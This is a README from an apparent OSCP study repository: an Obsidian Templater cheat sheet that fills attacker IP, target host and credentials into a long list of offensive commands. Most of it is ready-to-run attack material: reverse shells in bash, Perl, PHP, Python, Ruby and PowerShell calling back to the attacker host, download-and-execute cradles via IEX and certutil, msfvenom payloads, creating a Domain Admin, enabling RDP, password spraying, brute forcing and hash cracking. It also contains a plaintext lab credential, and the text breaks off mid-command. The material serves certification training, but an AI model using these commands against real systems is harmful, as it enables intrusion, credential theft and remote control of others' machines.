├── README.md └── aliases.md /README.md: -------------------------------------------------------------------------------- 1 | OSCP 2 | 3 | I used the Templater community plugin in Obsidian to automatically populate the IP, username and password in these notes. Thanks siddicky for this cool idea! 4 | 5 | I plan to actively maintain it if people like it. 6 | 7 | https://www.youtube.com/watch?v=2NLi4wzAvTw&t=634s 8 | 9 | Have a look at this video if you're wondering what I'm talking about! 10 | 11 | Steps to use: 12 | 13 | 1-> Download Obsidian, open Settings and browse "Community plugins" 14 | 15 | 2-> Install the Templater plugin by SilentVoid and enable it 16 | 17 | 3-> Copy the template and save it 18 | 19 | 4-> Create a new .md file and put in your desired values 20 | 21 | (hyphenhyphenhyphen below stands for the three-hyphen frontmatter delimiter, ---) 22 | 23 | ``` 24 | hyphenhyphenhyphen 25 | 26 | LHOST: 1.1.1.1 27 | RHOST: 0.0.0.0 28 | USERNAME: username 29 | PASSWORD: password 30 | DOMAIN: domain 31 | 32 | hyphenhyphenhyphen 33 | 34 | ``` 35 | 36 | Always make sure you have source mode enabled, otherwise this won't work! The values, password included, sit in plain text in the note's frontmatter, so keep the vault out of public repositories and shared sync folders. 37 | ![test](https://media.discordapp.net/attachments/1146454908539769002/1149737116167852122/image.png?width=1602&height=720) 38 | 39 | ![test](https://cdn.discordapp.com/attachments/1125391842125549601/1149407842885980190/image.png) 40 | 41 | 42 | 43 | 5-> Press Alt+E and select your template name 44 | 45 | BOOM 46 | 47 | To change the IP, I would either use Ctrl+Z or just create a new file with the method above ^ 48 | 49 | ## Shells & stuff 50 | https://www.revshells.com/ 51 | 52 | ```bash 53 | 54 | # Get-NTLM from password 55 | python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<% tp.frontmatter["PASSWORD"] %>".encode("utf-16le")).digest())' 56 | 57 | 58 | powershell "IEX(New-Object Net.Webclient).downloadString('http://<% tp.frontmatter["LHOST"] %>:/Invoke-PowerShellTcp.ps1')" 59 | 60 | 61 | # php cmd 62 | 63 | 64 | 65 | 66 | 67 | 68 |
 69 | 
 72 | 
73 | 74 | #enabling RDP 75 | Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0** 76 | 77 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 78 | Enable-NetFirewallRule -DisplayGroup "Remote Desktop" 79 | 80 | 81 | # ConPtyShell 82 | https://github.com/antonioCoco/ConPtyShell 83 | stty raw -echo 84 | 85 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/Others/ConPtyShell/Invoke-ConPtyShell.ps1 86 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/Others/ConPtyShell/ConPtyShell.exe 87 | 88 | 89 | . ./Invoke-ConPtyShell.ps1 90 | # exe 91 | stty raw -echo; (stty size; cat) | nc -lvnp 3001 92 | Invoke-ConPtyShell <% tp.frontmatter["LHOST"] %> 3001 93 | ./ConPtyShell.exe <% tp.frontmatter["LHOST"] %> 3001 94 | 95 | #manual upgrade 96 | Invoke-ConPtyShell -Upgrade -Rows 23 -Cols 115 97 | 98 | 99 | # Execute Command as another user 100 | PS C:\> $SecurePassword = ConvertTo-SecureString '<% tp.frontmatter["PASSWORD"] %>' -AsPlainText -Force 101 | PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('<% tp.frontmatter["USERNAME"] %>', $SecurePassword) 102 | PS C:\> $Session = New-PSSession -Credential $Cred 103 | PS C:\> Invoke-Command -Session $session -scriptblock { whoami } 104 | 105 | or 106 | $username = '<% tp.frontmatter["USERNAME"] %>' 107 | $password = '<% tp.frontmatter["PASSWORD"] %>' 108 | $securePassword = ConvertTo-SecureString $password -AsPlainText -Force 109 | $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword 110 | Start-Process powershell.exe -Credential $credential 111 | 112 | powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *" 113 | 114 | 115 | # Add new Domain Admin 116 | $PASSWORD= ConvertTo-SecureString –AsPlainText -Force -String <% tp.frontmatter["PASSWORD"] %> 117 
| New-ADUser -Name "<% tp.frontmatter["USERNAME"] %>" -Description "" -Enabled $true -AccountPassword $PASSWORD 118 | Add-ADGroupMember -Identity "Domain Admins" -Member <% tp.frontmatter["USERNAME"] %> 119 | 120 | #Execute Command in User Context 121 | $pass = ConvertTo-SecureString "<% tp.frontmatter["PASSWORD"] %>" -AsPlaintext -Force 122 | $cred = New-Object System.Management.Automation.PSCredential ("<% tp.frontmatter["DOMAIN"] %>\<% tp.frontmatter["USERNAME"] %>", $pass) 123 | Invoke-Command -computername -ConfigurationName dc_manage -credential $cred -command {whoami} 124 | 125 | #Execute Scripts with Creds (Reverse Shell) 126 | $pass = ConvertTo-SecureString "<% tp.frontmatter["PASSWORD"] %>" -AsPlainText -Force 127 | $cred = New-Object System.Management.Automation.PSCredential("<% tp.frontmatter["DOMAIN"] %>\<% tp.frontmatter["USERNAME"] %>", $pass) 128 | Invoke-Command -Computer <% tp.frontmatter["RHOST"] %> -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://<% tp.frontmatter["LHOST"] %>/.ps1') } -Credential $cred 129 | 130 | 131 | ``` 132 | 133 | 134 | ## Reverse shell 135 | ```bash 136 | 137 | #reverse shell 138 | bash -i >& /dev/tcp/<% tp.frontmatter["LHOST"] %>/ 0>&1 139 | bash -c 'bash -i >& /dev/tcp/<% tp.frontmatter["LHOST"] %>/ 0>&1' 140 | echo -n '/bin/bash -c "bin/bash -i >& /dev/tcp/<% tp.frontmatter["LHOST"] %>/ 0>&1"' | base64 141 | 142 | # curl Reverse shell 143 | curl --header "Content-Type: application/json" --request POST http://<% tp.frontmatter["RHOST"] %>:/upload --data '{"auth": {"name": "<% tp.frontmatter["USERNAME"] %>", "password": "<% tp.frontmatter["PASSWORD"] %>"}, "filename" : "& echo "bash -i >& /dev/tcp/<% tp.frontmatter["LHOST"] %>/ 0>&1"|base64 -d|bash"}' 144 | 145 | #mkfifo Reverse shell 146 | mkfifo /tmp/shell; nc <% tp.frontmatter["LHOST"] %> 0/tmp/shell 2>&1; rm /tmp/shell 147 | 148 | #netcat reverse shell 149 | nc -e /bin/sh <% tp.frontmatter["LHOST"] %> 150 | 151 | #perl reverse shell 152 | perl -e 
'use Socket;$i="<% tp.frontmatter["LHOST"] %>";$p=;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 153 | 154 | #PHP reverse shell 155 | php -r '$sock=fsockopen("<% tp.frontmatter["LHOST"] %>",);exec("/bin/sh -i <&3 >&3 2>&3");' 156 | 157 | #msfvenom 158 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT=4444 -f exe -o reverse.exe 159 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT=4444 -f dll -o reverse.dll 160 | 161 | #Powershell Reverse shell 162 | $client = New-Object System.Net.Sockets.TCPClient('<% tp.frontmatter["LHOST"] %>',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 163 | 164 | powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<% tp.frontmatter["LHOST"] %>',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 165 | 166 | powershell -nop -exec bypass -c '$client = New-Object System.Net.Sockets.TCPClient("<% tp.frontmatter["LHOST"] %>",);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object 
-TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' 167 | 168 | $Text = '$client = New-Object System.Net.Sockets.TCPClient("<% tp.frontmatter["LHOST"] %>",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' 169 | $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) 170 | $EncodedText =[Convert]::ToBase64String($Bytes) 171 | $EncodedText 172 | 173 | #python reverse shell 174 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<% tp.frontmatter["LHOST"] %>",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 175 | 176 | python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<% tp.frontmatter["LHOST"] %>",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 177 | 178 | python -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,"fruity\n");time.sleep(0.1);print os.read(master,1024);' 179 | 180 | #ruby reverse shell 181 | ruby -rsocket -e'f=TCPSocket.open("<% tp.frontmatter["LHOST"] %>",).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 182 | 183 | # nishang 184 | cd path/to/nishang/Shells/ 185 | cp 
Invoke-PowerShellTcp.ps1 Invoke-PowerShellTcp.ps1 186 | Invoke-PowerShellTcp -Reverse -IPAddress <% tp.frontmatter["LHOST"] %> -Port 187 | 188 | ``` 189 | 190 | ## File Sharing 191 | ```bash 192 | ## File Sharing 193 | 194 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/reverse.exe 195 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/Linux/linpeas.sh 196 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/Windows/ 197 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/Windows/mimikatz/mimikatz.exe 198 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/Windows/exe/winPEASany.exe 199 | 200 | c:/users/public/ 201 | 202 | 203 | impacket-smbserver test /home/rachit -smb2support -user joe -password joe 204 | net use m: \\<% tp.frontmatter["LHOST"] %>\test /user:joe joe /persistent:yes 205 | copy * \\<% tp.frontmatter["LHOST"] %>\test 206 | smbserver.py -smb2support test . 207 | 208 | 209 | iwr -uri <% tp.frontmatter["LHOST"] %>:8000/ -Outfile 210 | IEX(IWR http://<% tp.frontmatter["LHOST"] %>/) -UseBasicParsing 211 | powershell -command Invoke-WebRequest -Uri http://<% tp.frontmatter["LHOST"] %>:/ -Outfile C:\\temp\\ 212 | Invoke-Expression (Invoke-WebRequest http://.ps1) 213 | 214 | 215 | wget http://<% tp.frontmatter["LHOST"] %>/ 216 | wget -r --no-parent http://<% tp.frontmatter["LHOST"] %>/ 217 | wget -m http://<% tp.frontmatter["LHOST"] %>/ 218 | 219 | curl http://<% tp.frontmatter["LHOST"] %>/ > 220 | 221 | #MSF 222 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT= -f exe -o .exe 223 | 224 | msf6 > use exploit/multi/handler 225 | [*] Using configured payload generic/shell_reverse_tcp 226 | msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp 227 | payload => windows/x64/meterpreter/reverse_tcp 228 | msf6 exploit(multi/handler) > set LHOST <% tp.frontmatter["LHOST"] %> 229 | LHOST => <% 
tp.frontmatter["LHOST"] %> 230 | msf6 exploit(multi/handler) > set LPORT 231 | LPORT => 232 | msf6 exploit(multi/handler) > run 233 | 234 | .\.exe 235 | 236 | meterpreter > download * 237 | ``` 238 | 239 | 240 | 241 | ## Tools 242 | ```bash 243 | # nmapAutomator 244 | ./nmapAutomator.sh -H <% tp.frontmatter["RHOST"] %> -T All 245 | 246 | #nmap 247 | sudo nmap -A -T4 -sC -sV -p- <% tp.frontmatter["RHOST"] %> 248 | sudo nmap -sV -sU <% tp.frontmatter["RHOST"] %> 249 | sudo nmap -A -T4 -sC -sV --script vuln <% tp.frontmatter["RHOST"] %> 250 | sudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery <% tp.frontmatter["RHOST"] %> 251 | sudo nmap -sC -sV -p- --scan-delay 5s <% tp.frontmatter["RHOST"] %> 252 | sudo nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test' <% tp.frontmatter["RHOST"] %> 253 | ls -lh /usr/share/nmap/scripts/*ssh* 254 | locate -r '\.nse$' | xargs grep categories | grep categories | grep 'default\|version\|safe' | grep smb 255 | 256 | # evil-winrm 257 | evil-winrm -i <% tp.frontmatter["RHOST"] %> -u '<% tp.frontmatter["USERNAME"] %>' -p '<% tp.frontmatter["PASSWORD"] %>' 258 | evil-winrm -i <% tp.frontmatter["RHOST"] %> -u '<% tp.frontmatter["USERNAME"] %>' -H '' 259 | 260 | # xfreerdp 261 | xfreerdp /v:<% tp.frontmatter["RHOST"] %> /u:<% tp.frontmatter["USERNAME"] %> /p:<% tp.frontmatter["PASSWORD"] %> /dynamic-resolution +clipboard 262 | xfreerdp /v:<% tp.frontmatter["RHOST"] %> /u:<% tp.frontmatter["USERNAME"] %> /d:<% tp.frontmatter["DOMAIN"] %> /pth:'' /dynamic-resolution +clipboard 263 | 264 | # smbclient 265 | smbclient -L \\<% tp.frontmatter["RHOST"] %>\ -N 266 | smbclient -L //<% tp.frontmatter["RHOST"] %>/ -N 267 | smbclient -L ////<% tp.frontmatter["RHOST"] %>/ -N 268 | smbclient -U "<% tp.frontmatter["USERNAME"] %>" -L \\\\<% tp.frontmatter["RHOST"] %>\\ 269 | smbclient -L //<% tp.frontmatter["RHOST"] %>// -U <% tp.frontmatter["USERNAME"] %>%<% tp.frontmatter["PASSWORD"] %> 270 | smbclient //<% 
tp.frontmatter["RHOST"] %>/SYSVOL -U <% tp.frontmatter["USERNAME"] %>%<% tp.frontmatter["PASSWORD"] %> 271 | smbclient "\\\\<% tp.frontmatter["RHOST"] %>\" 272 | smbclient \\\\<% tp.frontmatter["RHOST"] %>\\ -U '<% tp.frontmatter["USERNAME"] %>' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000 273 | smbclient --no-pass //<% tp.frontmatter["RHOST"] %>/ 274 | mount.cifs //<% tp.frontmatter["RHOST"] %>/ /mnt/remote 275 | guestmount --add '//' --inspector --ro /mnt/ -v 276 | 277 | mask"" 278 | recurse ON 279 | prompt OFF 280 | mget * 281 | 282 | 283 | # snmpwalk 284 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> 285 | snmpwalk -v2c -c public <% tp.frontmatter["RHOST"] %> 1.3.6.1.2.1.4.34.1.3 286 | snmpwalk -v2c -c public <% tp.frontmatter["RHOST"] %> .1 287 | snmpwalk -v2c -c public <% tp.frontmatter["RHOST"] %> nsExtendObjects 288 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> 1.3.6.1.4.1.77.1.2.25 289 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> 1.3.6.1.2.1.25.4.2.1.2 290 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> .1.3.6.1.2.1.1.5 291 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> 1.3.6.1.4.1.77.1.2.3.1.1 292 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> 1.3.6.1.4.1.77.1.2.27 293 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> 1.3.6.1.2.1.6.13.1.3 294 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> 1.3.6.1.2.1.25.6.3.1.2 295 | 296 | 1.3.6.1.2.1.25.1.6.0 System Processes 297 | 1.3.6.1.2.1.25.4.2.1.2 Running Programs 298 | 1.3.6.1.2.1.25.4.2.1.4 Processes Path 299 | 1.3.6.1.2.1.25.2.3.1.4 Storage Units 300 | 1.3.6.1.2.1.25.6.3.1.2 Software Name 301 | 1.3.6.1.4.1.77.1.2.25 User Accounts 302 | 1.3.6.1.2.1.6.13.1.3 TCP Local Ports 303 | 304 | 305 | # crackmapexec 306 | 307 | # Dont forget to use 308 | --local-auth 309 | 310 | crackmapexec smb <% tp.frontmatter["RHOST"] %> -u "" -p "" --shares 311 | crackmapexec smb <% tp.frontmatter["RHOST"] %> -u "<% 
tp.frontmatter["USERNAME"] %>" -p "<% tp.frontmatter["PASSWORD"] %>" --shares 312 | crackmapexec smb <% tp.frontmatter["RHOST"] %> -u "" -p "" --shares -M spider_plus 313 | crackmapexec ssh <% tp.frontmatter["RHOST"] %> -u "<% tp.frontmatter["USERNAME"] %>" -p "<% tp.frontmatter["PASSWORD"] %>" --continue-on-success 314 | crackmapexec ftp <% tp.frontmatter["RHOST"] %> -u "<% tp.frontmatter["USERNAME"] %>" -p "<% tp.frontmatter["PASSWORD"] %>" --continue-on-success 315 | crackmapexec mssql <% tp.frontmatter["RHOST"] %> -u "<% tp.frontmatter["USERNAME"] %>" -p "<% tp.frontmatter["PASSWORD"] %>" 316 | crackmapexec winrm <% tp.frontmatter["RHOST"] %> -u "<% tp.frontmatter["USERNAME"] %>" -p '<% tp.frontmatter["PASSWORD"] %>' -d <% tp.frontmatter["DOMAIN"] %> --continue-on-success 317 | crackmapexec winrm <% tp.frontmatter["RHOST"] %> -u "<% tp.frontmatter["USERNAME"] %>" -H '' -d <% tp.frontmatter["DOMAIN"] %> --continue-on-success 318 | 319 | # Kerbrute 320 | ./kerbrute userenum -d <% tp.frontmatter["DOMAIN"] %> --dc <% tp.frontmatter["DOMAIN"] %> /PATH/TO/FILE/ 321 | ./kerbrute passwordspray -d <% tp.frontmatter["DOMAIN"] %> --dc <% tp.frontmatter["DOMAIN"] %> /PATH/TO/FILE/ <% tp.frontmatter["PASSWORD"] %> 322 | 323 | 324 | #ldap 325 | ldapsearch -x -w <% tp.frontmatter["PASSWORD"] %> 326 | ldapsearch -x -H ldap://<% tp.frontmatter["RHOST"] %> -s base namingcontexts 327 | ldapsearch -x -b "dc=<% tp.frontmatter["DOMAIN"] %>,dc=offsec" "*" -H ldap://<% tp.frontmatter["RHOST"] %> | awk '/dn: / {print $2}' 328 | ldapsearch -x -D "cn=admin,dc=<% tp.frontmatter["DOMAIN"] %>,dc=offsec" -s sub "cn=*" -H ldap://<% tp.frontmatter["RHOST"] %> | awk '/uid: /{print $2}' | nl 329 | ldapsearch -D "cn=admin,dc=acme,dc=com" "(objectClass=*)" -w ldapadmin -h ldap.acme.com 330 | ldapsearch -x -H ldap://<% tp.frontmatter["RHOST"] %> -D "<% tp.frontmatter["USERNAME"] %>" -b "dc=<% tp.frontmatter["DOMAIN"] %>,dc=offsec" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd 331 | ldapsearch -H ldap://<% 
tp.frontmatter["DOMAIN"] %> -b "DC=<% tp.frontmatter["DOMAIN"] %>,DC=local" > .txt 332 | 333 | 334 | 335 | ldapsearch -x -H ldap://dc.support.htb -D 'SUPPORT\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=SUPPORT,DC=HTB" | tee ldap_dc.support.htb.txt 336 | ldapdomaindump -u 'support\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' dc.support.htb 337 | 338 | 339 | 340 | 341 | # Get computers 342 | python3 windapsearch.py --dc-ip <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %>@domain.local -p <% tp.frontmatter["PASSWORD"] %> --computers 343 | # Get groups 344 | python3 windapsearch.py --dc-ip <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %>@domain.local -p <% tp.frontmatter["PASSWORD"] %> --groups 345 | # Get users 346 | python3 windapsearch.py --dc-ip <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %>@domain.local -p <% tp.frontmatter["PASSWORD"] %> --da 347 | # Get Domain Admins 348 | python3 windapsearch.py --dc-ip <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %>@domain.local -p <% tp.frontmatter["PASSWORD"] %> --da 349 | # Get Privileged Users 350 | python3 windapsearch.py --dc-ip <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %>@domain.local -p <% tp.frontmatter["PASSWORD"] %> --privileged-users 351 | 352 | 353 | #powercat 354 | powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<% tp.frontmatter["LHOST"] %>/powercat.ps1');powercat -c <% tp.frontmatter["LHOST"] %> -p -e cmd" 355 | 356 | #adpeas 357 | Import-Module .\adPEAS.ps1 358 | . 
.\adPEAS.ps1 359 | Invoke-adPEAS 360 | Invoke-adPEAS -Domain '<% tp.frontmatter["DOMAIN"] %>' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor 361 | 362 | #### Certipy 363 | certipy find -dc-ip <% tp.frontmatter["PASSWORD"] %> -u <% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["DOMAIN"] %> -p <% tp.frontmatter["PASSWORD"] %> 364 | certipy find -dc-ip <% tp.frontmatter["PASSWORD"] %> -u <% tp.frontmatter["USERNAME"] %> -p <% tp.frontmatter["PASSWORD"] %> -vulnerable -stdout 365 | 366 | #rpcclient 367 | rpcclient -U "" <% tp.frontmatter["RHOST"] %> 368 | 369 | # msfvenom && metasploit execution 370 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT= -b "\x00\x0a" -a x86 --platform windows -f exe -o exploit.exe 371 | 372 | msf6 > use exploit/multi/handler 373 | msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 374 | msf6 exploit(multi/handler) > set LHOST <% tp.frontmatter["LHOST"] %> 375 | msf6 exploit(multi/handler) > set LPORT <% tp.frontmatter["LHOST"] %> 376 | msf6 exploit(multi/handler) > run 377 | 378 | .\exploit.exe 379 | ``` 380 | 381 | 382 | ## Pivoting 383 | ```bash 384 | #ligolo 385 | 386 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/Windows/Ligolo/agent.exe 387 | 388 | sudo ip tuntap add user root mode tun ligolo 389 | sudo ip link set ligolo up 390 |  # LHOST machine 391 | ./proxy -selfcert 392 | # RHOST machine 393 | ./agent -ignore-cert -connect <% tp.frontmatter["LHOST"] %>:11601 394 | ./agent.exe -ignore-cert -connect <% tp.frontmatter["LHOST"] %>:11601 395 | #route 396 | sudo ip route add x.x.x.x dev ligolo 397 | 398 | help command 399 | listener_add --addr 0.0.0.0:8000 --to 127.0.0.1:7777 --tcp 400 | 401 | 402 | #chisel 403 | #Run command on attacker machine 404 | chisel server -p 8001 --reverse 405 | #Run command on Web Server machine 406 |  .  
.\chisel.exe client <% tp.frontmatter["LHOST"] %>:8001 R:1080:socks 407 | and edit the proxychains with the port that chisel provided 408 | ``` 409 | 410 | 411 | ## Protocols 412 | ``` 413 | # SSH 414 | ssh user@<% tp.frontmatter["RHOST"] %> -oKexAlgorithms=+diffie-hellman-group1-sha1 415 | ssh -i key.pem user@<% tp.frontmatter["RHOST"] %> 416 | 417 | ../../../../../../../../../home/<% tp.frontmatter["USERNAME"] %>/.ssh/id_rsa 418 | 419 | hydra -v -V -u -L users -P password -t 1 -u <% tp.frontmatter["RHOST"] %>  ssh 420 | 421 | #FTP 422 | wget-m --no-passive ftp://<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %>@<% tp.frontmatter["LHOST"] %> 423 | wget -r ftp://<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %>@example.com/remote/dir/ 424 | 425 | ``` 426 | 427 | `` 428 | ## Fuzzing/Bruteforcing 429 | ```bash 430 | 431 | # common file extensions 432 | txt,bak,php,html,js,asp,aspx 433 | 434 | # common picture extensions 435 | png,jpg,jpeg,gif,bmp 436 | 437 | # feroxbuster 438 | feroxbuster -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt  --url http://<% tp.frontmatter["RHOST"] %>/  -x php,aspx,jsp,pdf -C 404,401,403 --output brute.txt 439 | 440 | # Gobuster 441 | gobuster dir -u http://<% tp.frontmatter["RHOST"] %>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 442 | 443 | # API Fuzzing 444 | ffuf -u https://<% tp.frontmatter["RHOST"] %>/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412 445 | 446 | # File Extensions 447 | ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<% tp.frontmatter["RHOST"] %>/cd/ext/logs/FUZZ -e .log 448 | 449 | # Searching for LFI 450 | ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://<% tp.frontmatter["RHOST"] %>/admin../admin_staging/index.php?page=FUZZ -fs 15349 451 | 452 | # WPScan 453 | wpscan --url https://<% tp.frontmatter["RHOST"] %> --enumerate u,t,p 454 | wpscan --url 
https://<% tp.frontmatter["RHOST"] %> --plugins-detection aggressive 455 | wpscan --url https://<% tp.frontmatter["RHOST"] %> --disable-tls-checks 456 | wpscan --url https://<% tp.frontmatter["RHOST"] %> --disable-tls-checks --enumerate u,t,p 457 | wpscan --url http://<% tp.frontmatter["RHOST"] %> -U <% tp.frontmatter["USERNAME"] %> -P passwords.txt -t 50 458 | wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://<% tp.frontmatter["RHOST"] %> --plugins-detection aggressive 459 | 460 | # API token replaced with a placeholder - supply it at run time instead of saving it in the template 461 | wpscan --url http://192.168.243.244 --enumerate p --plugins-detection aggressive  --api-token <WPSCAN_API_TOKEN> 462 | 463 | 464 | 465 | 466 | # Hydra 467 | hydra <% tp.frontmatter["RHOST"] %> -l <% tp.frontmatter["USERNAME"] %> -P /usr/share/wordlists/ ftp|ssh|smb://<% tp.frontmatter["RHOST"] %> 468 | hydra -l <% tp.frontmatter["USERNAME"] %> -P /usr/share/wordlists/rockyou.txt <% tp.frontmatter["RHOST"] %> http-post-form "/admin.php:username=^USER^&password=^PASS^:login_error" 469 | 470 | sudo hydra -L /usr/share/wordlists/rockyou.txt -p "<% tp.frontmatter["PASSWORD"] %>" rdp://<% tp.frontmatter["RHOST"] %> 471 | sudo hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://<% tp.frontmatter["RHOST"] %> 472 | 473 | #crowbar 474 | #  RDP brute forcing a single IP address using a single username and a single password: 475 | ./crowbar.py -b rdp -s <% tp.frontmatter["RHOST"] %>/32 -u admin -c Aa123456 476 |  # username list and a single password 477 |  ./crowbar.py -b rdp -s <% tp.frontmatter["RHOST"] %>/32 -U ~/Desktop/userlist -c passw0rd 478 |  # username and a single password list 479 |   ./crowbar.py -b rdp -s <% tp.frontmatter["RHOST"] %>/32 -u localuser -C ~/Desktop/passlist 480 |  # username list and password list 481 |  ./crowbar.py -b rdp -s <% tp.frontmatter["RHOST"] %>/24 -U ~/Desktop/userlist -C ~/Desktop/passlist -d 482 | ``` 483 | 484 | 485 | ### Cracking 486 | ```bash 487 | # Hashcat 488 | 489 | Asrep Roast 
490 | hashcat -m 18200 -a 0 491 | sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force 492 | hashcat -m 18200-a 0asrep.txt passwords.txt --outfile asrepcrack.txt --forcehashcat 493 | 494 | Kerberoast 495 | hashcat -m 13100 --force 496 | sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force 497 | 498 | 499 | #keypass 500 | keepass2<% tp.frontmatter["USERNAME"] %> Database.kdbx > keepass.hash 501 | hashcat --help | grep -i "KeePass" 502 | hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force 503 | 504 | #id_rsa 505 | ssh2<% tp.frontmatter["USERNAME"] %> id_rsa > ssh.hash 506 | hashcat -h | grep -i "ssh" 507 | hashcat -m 22921 